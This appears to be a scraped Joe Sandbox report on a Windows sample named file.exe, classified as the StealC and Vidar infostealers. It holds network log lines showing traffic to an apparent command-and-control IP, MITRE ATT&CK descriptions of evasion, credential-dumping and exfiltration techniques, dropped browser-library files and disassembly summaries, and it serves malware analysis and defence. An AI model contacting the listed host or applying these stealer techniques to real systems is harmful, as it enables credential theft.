Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAK

C:\ProgramData\AECAKECAEGDHIECBGHII

C:\ProgramData\HCAKFBGC

C:\ProgramData\HCAKFBGCBFHIJKECGIIJKJKJKJ

C:\ProgramData\HDAFIIDA

C:\ProgramData\HIDAKFIJJKJJJKEBKJEHCBGDAK

C:\ProgramData\JJKFBAKFBGDHIEBGDAKFCAFHCB

C:\ProgramData\KKFBAAFCGIEGDHIEBFII

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 008B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 008A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 008ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 008B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 008A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 008B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 008A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 008B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 008A5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre